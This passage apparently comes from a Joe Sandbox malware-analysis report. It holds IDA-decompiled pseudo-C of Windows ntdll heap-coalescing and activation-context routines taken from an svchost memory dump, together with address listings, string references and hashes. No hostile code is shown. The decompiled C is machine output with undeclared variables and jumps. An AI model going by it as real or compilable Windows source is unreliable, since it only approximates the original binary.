						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                        0x03058e0f
                        0x03058e16
                        0x03058e19
                        0x03058e1b
                        0x03058e21
                        0x03058e7f
                        0x03058e85
                        0x03099354
                        0x0309936c
                        0x03099371
                        0x0309937b
                        0x03099381
                        0x03099381
                        0x0309937b
                        0x03058e9d
                        0x03058e9d
                        0x03058e29
                        0x03058e2c
                        0x03058e38
                        0x03058e3e
                        0x03058e43
                        0x03058eb5
                        0x03058eb9
                        0x030992aa
                        0x030992af
                        0x030992e8
                        0x030992e8
                        0x030992af
                        0x03058eb9
                        0x03058e45
                        0x03058e53
                        0x03058e5b
                        0x03058e5f
                        0x03058e78
                        0x03058e78
                        0x03058e7d
                        0x03058ec3
                        0x03058ecd
                        0x03058ed2
                        0x03058ed2
                        0x03058ec5
                        0x03058ec5
                        0x00000000
                        0x03058e7d
                        0x03058e67
                        0x03058ea4
                        0x0309931a
                        0x00000000
                        0x00000000
                        0x03099320
                        0x03058ea4
                        0x03058e70
                        0x03099325
                        0x03099340
                        0x03099345
                        0x03099345
                        0x03058e76
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000

                        Strings
                        • LdrpFindDllActivationContext, xrefs: 03099331, 0309935D
                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0309932A
                        • minkernel\ntdll\ldrsnap.c, xrefs: 0309933B, 03099367
                        • Querying the active activation context failed with status 0x%08lx, xrefs: 03099357
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                        • API String ID: 0-3779518884
                        • Opcode ID: 4316438b663870133de754912fbea73a4f339b32c0f8212a3c1327b598394a15
                        • Instruction ID: e170f0cbed1663a62f797bf6bf4b8294d3719a7af3a17e8ff2cacd7224eab805
                        • Opcode Fuzzy Hash: 4316438b663870133de754912fbea73a4f339b32c0f8212a3c1327b598394a15
                        • Instruction Fuzzy Hash: 83410A32B833159FEFA5EA549849B7BB2F9A745204F0DC569FC145B191E7605C808293
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030E49A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                        • API String ID: 2994545307-336120773
                        • Opcode ID: 6cd4a71b290f7709ebd0347988852843e63d2ae5277b3157d7384a2a71a3b061
                        • Instruction ID: 75154e45eb55e35d425b224f0c8eab36baff971dcd3ff5d231befafa0317afd4
                        • Opcode Fuzzy Hash: 6cd4a71b290f7709ebd0347988852843e63d2ae5277b3157d7384a2a71a3b061
                        • Instruction Fuzzy Hash: 0D310539303214EFD365DB99C886FAAB3E9EF44630F1C4565F4159F281D671E880CB58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030499BF Relevance: 4.3, Strings: 3, Instructions: 572COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E030499BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E030DFA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E030EA80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E0307D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E0302B150();
										} else {
											E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E0302B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x3116378 = 1;
											asm("int3");
											 *0x3116378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E0304A229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E0304A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E0304BC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E030EA80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E0304A229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E0304A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E0307D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E0302B150();
								} else {
									E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E0302B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x3116378 = 1;
									asm("int3");
									 *0x3116378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E030DFA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E030EA80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E0307D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E0302B150();
													} else {
														E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E0302B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x3116378 = 1;
														asm("int3");
														 *0x3116378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E0304A229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E0304A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E0304BC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E030EA80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E0307D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E0302B150();
													} else {
														E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E0302B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x3116378 = 1;
														asm("int3");
														 *0x3116378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E0304A229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E0304A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E0304BC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E0304BC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}




















































































                        0x030499ca
                        0x030499cc
                        0x030499df
                        0x030499e3
                        0x030499f8
                        0x030499fb
                        0x030499fb
                        0x00000000
                        0x03049a48
                        0x03049a48
                        0x03049a4c
                        0x03049a51
                        0x03049a55
                        0x03049a61
                        0x03049a66
                        0x03049a68
                        0x03091457
                        0x0309145c
                        0x0309145c
                        0x03049a68
                        0x03049a6e
                        0x03049a71
                        0x03049a74
                        0x03049a76
                        0x03091466
                        0x03091469
                        0x03091469
                        0x0309146c
                        0x0309146e
                        0x03091471
                        0x03091474
                        0x03091477
                        0x03091479
                        0x0309159c
                        0x0309159c
                        0x0309159d
                        0x030915a6
                        0x030915ab
                        0x030915ab
                        0x00000000
                        0x030915ab
                        0x0309147f
                        0x03091481
                        0x00000000
                        0x00000000
                        0x0309148a
                        0x0309148d
                        0x03091493
                        0x03091495
                        0x030914c0
                        0x030914c0
                        0x030914c3
                        0x030914c6
                        0x030914c8
                        0x030914cb
                        0x030914cf
                        0x030914f2
                        0x030914f2
                        0x030914f5
                        0x030914f8
                        0x03091501
                        0x03091508
                        0x0309150b
                        0x0309150e
                        0x03091510
                        0x03091513
                        0x03091515
                        0x03091515
                        0x03091518
                        0x03091518
                        0x03091513
                        0x03091521
                        0x03091525
                        0x0309152a
                        0x0309152d
                        0x03091530
                        0x03091532
                        0x03091539
                        0x0309153d
                        0x0309155d
                        0x03091562
                        0x0309153f
                        0x03091555
                        0x0309155a
                        0x03091570
                        0x03091577
                        0x0309157c
                        0x03091582
                        0x03091585
                        0x03091589
                        0x0309158b
                        0x03091592
                        0x03091593
                        0x03091593
                        0x03091589
                        0x03091530
                        0x00000000
                        0x030914f8
                        0x030914d5
                        0x030914da
                        0x030914dc
                        0x00000000
                        0x030914de
                        0x030914e8
                        0x00000000
                        0x030914e8
                        0x03091497
                        0x03091497
                        0x030914a4
                        0x030914a4
                        0x030914a7
                        0x030914a9
                        0x030914ab
                        0x030914ab
                        0x0309149c
                        0x0309149e
                        0x030914a0
                        0x030914b0
                        0x030914b0
                        0x00000000
                        0x030914a2
                        0x030914a2
                        0x00000000
                        0x030914a2
                        0x030914a0
                        0x030914b3
                        0x030914bb
                        0x00000000
                        0x030914bb
                        0x03091495
                        0x03049a7c
                        0x03049a7c
                        0x03049a7f
                        0x03049a7f
                        0x03049a82
                        0x03049a84
                        0x03049a87
                        0x03049a8a
                        0x03049a8d
                        0x03049a8f
                        0x0309166a
                        0x0309166a
                        0x0309166b
                        0x03091674
                        0x00000000
                        0x03091674
                        0x03049a95
                        0x03049a97
                        0x00000000
                        0x00000000
                        0x03049aa0
                        0x03049aa3
                        0x03049aa9
                        0x03049aab
                        0x03049ad7
                        0x03049ad7
                        0x03049ada
                        0x03049add
                        0x03049adf
                        0x03049ae2
                        0x03049ae6
                        0x03049b22
                        0x03049b27
                        0x03049b29
                        0x00000000
                        0x03049b2b
                        0x030915be
                        0x00000000
                        0x030915be
                        0x03049b29
                        0x03049ae8
                        0x03049ae8
                        0x03049aeb
                        0x03049aee
                        0x030915cb
                        0x030915d2
                        0x030915d5
                        0x030915d7
                        0x030915da
                        0x030915dc
                        0x030915dc
                        0x030915dc
                        0x030915da
                        0x030915e5
                        0x030915e9
                        0x030915ee
                        0x030915f1
                        0x030915f3
                        0x030915f9
                        0x03091600
                        0x03091604
                        0x03091624
                        0x03091629
                        0x03091606
                        0x0309161c
                        0x03091621
                        0x03091637
                        0x0309163e
                        0x03091643
                        0x03091649
                        0x0309164c
                        0x03091650
                        0x03091656
                        0x0309165d
                        0x0309165e
                        0x0309165e
                        0x03091650
                        0x030915f3
                        0x03049af4
                        0x03049af7
                        0x03049afc
                        0x03049b00
                        0x03049b04
                        0x03049b08
                        0x03049b14
                        0x030499fe
                        0x03049a04
                        0x03049a07
                        0x00000000
                        0x03049a29
                        0x0309169c
                        0x030916a0
                        0x030916a5
                        0x030916a9
                        0x030916b5
                        0x030916ba
                        0x030916bc
                        0x030916be
                        0x030916c3
                        0x030916c3
                        0x030916bc
                        0x030916c8
                        0x030916cc
                        0x0309181b
                        0x0309181b
                        0x0309181e
                        0x0309181e
                        0x03091821
                        0x03091823
                        0x03091826
                        0x03091829
                        0x0309182c
                        0x0309182e
                        0x03091688
                        0x03091688
                        0x03091689
                        0x0309168b
                        0x0309168c
                        0x0309168d
                        0x0309168f
                        0x03091692
                        0x00000000
                        0x03091692
                        0x03091834
                        0x03091836
                        0x00000000
                        0x00000000
                        0x0309183f
                        0x03091842
                        0x03091848
                        0x0309184a
                        0x03091875
                        0x03091875
                        0x03091878
                        0x0309187b
                        0x0309187d
                        0x03091880
                        0x03091884
                        0x030918a7
                        0x030918a7
                        0x030918aa
                        0x030918ad
                        0x030918b6
                        0x030918bd
                        0x030918c0
                        0x030918c3
                        0x030918c5
                        0x030918c8
                        0x030918ca
                        0x030918ca
                        0x030918cd
                        0x030918cd
                        0x030918c8
                        0x030918d5
                        0x030918da
                        0x030918df
                        0x030918e2
                        0x030918e5
                        0x030918e7
                        0x030918ee
                        0x030918f2
                        0x03091912
                        0x03091917
                        0x030918f4
                        0x0309190a
                        0x0309190f
                        0x03091925
                        0x0309192c
                        0x03091931
                        0x0309193a
                        0x0309193e
                        0x03091940
                        0x03091947
                        0x03091948
                        0x03091948
                        0x0309193e
                        0x030918e5
                        0x0309194f
                        0x03091952
                        0x03091956
                        0x0309195d
                        0x03091961
                        0x0309196d
                        0x00000000
                        0x0309196d
                        0x0309188a
                        0x0309188f
                        0x03091891
                        0x00000000
                        0x00000000
                        0x0309189d
                        0x00000000
                        0x0309189d
                        0x0309184c
                        0x03091859
                        0x03091859
                        0x0309185c
                        0x00000000
                        0x00000000
                        0x03091851
                        0x03091853
                        0x03091855
                        0x03091865
                        0x03091865
                        0x03091866
                        0x03091868
                        0x03091870
                        0x00000000
                        0x03091870
                        0x03091857
                        0x03091857
                        0x0309185e
                        0x00000000
                        0x030916d2
                        0x030916d2
                        0x030916d5
                        0x030916d5
                        0x030916d8
                        0x030916da
                        0x030916dd
                        0x030916e0
                        0x030916e3
                        0x030916e5
                        0x03091808
                        0x03091808
                        0x03091809
                        0x03091812
                        0x03091817
                        0x03091817
                        0x00000000
                        0x03091817
                        0x030916eb
                        0x030916ed
                        0x00000000
                        0x00000000
                        0x030916f6
                        0x030916f9
                        0x030916ff
                        0x03091701
                        0x0309172c
                        0x0309172c
                        0x0309172f
                        0x03091732
                        0x03091734
                        0x03091737
                        0x0309173b
                        0x0309175e
                        0x0309175e
                        0x03091761
                        0x03091764
                        0x0309176d
                        0x03091774
                        0x03091777
                        0x0309177a
                        0x0309177c
                        0x0309177f
                        0x03091781
                        0x03091781
                        0x03091784
                        0x03091784
                        0x0309177f
                        0x0309178c
                        0x03091791
                        0x03091796
                        0x03091799
                        0x0309179c
                        0x0309179e
                        0x030917a5
                        0x030917a9
                        0x030917c9
                        0x030917ce
                        0x030917ab
                        0x030917c1
                        0x030917c6
                        0x030917dc
                        0x030917e3
                        0x030917e8
                        0x030917ee
                        0x030917f1
                        0x030917f5
                        0x030917f7
                        0x030917fe
                        0x030917ff
                        0x030917ff
                        0x030917f5
                        0x0309179c
                        0x00000000
                        0x03091764
                        0x03091741
                        0x03091746
                        0x03091748
                        0x00000000
                        0x00000000
                        0x03091754
                        0x00000000
                        0x03091754
                        0x03091703
                        0x03091710
                        0x03091710
                        0x03091713
                        0x00000000
                        0x00000000
                        0x03091708
                        0x0309170a
                        0x0309170c
                        0x0309171c
                        0x0309171c
                        0x0309171d
                        0x0309171f
                        0x03091727
                        0x00000000
                        0x03091727
                        0x0309170e
                        0x0309170e
                        0x03091715
                        0x00000000
                        0x03091715
                        0x030916cc
                        0x03049a45
                        0x03049a45
                        0x03049a0e
                        0x03049a1c
                        0x03049a23
                        0x0309167e
                        0x0309167f
                        0x03091681
                        0x03091683
                        0x03091684
                        0x00000000
                        0x03091684
                        0x00000000
                        0x03049aad
                        0x03049aad
                        0x03049ab0
                        0x03049ab3
                        0x03049ab3
                        0x03049ab6
                        0x00000000
                        0x00000000
                        0x03049ab8
                        0x03049aba
                        0x03049abc
                        0x03049ac8
                        0x03049ac8
                        0x00000000
                        0x03049abe
                        0x03049abe
                        0x03049ac0
                        0x00000000
                        0x03049ac0
                        0x03049abc
                        0x03049ad2
                        0x00000000
                        0x03049ad2
                        0x03049aab

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                        • API String ID: 0-3178619729
                        • Opcode ID: 3be5ef84d9337a2c5705b4e812347cf458b88379b2636c6ce8d0971e8045a8e5
                        • Instruction ID: 0453031b52b1dbf84c3d26812b7cda39f6199108a30a6499f96382018e713ab7
                        • Opcode Fuzzy Hash: 3be5ef84d9337a2c5705b4e812347cf458b88379b2636c6ce8d0971e8045a8e5
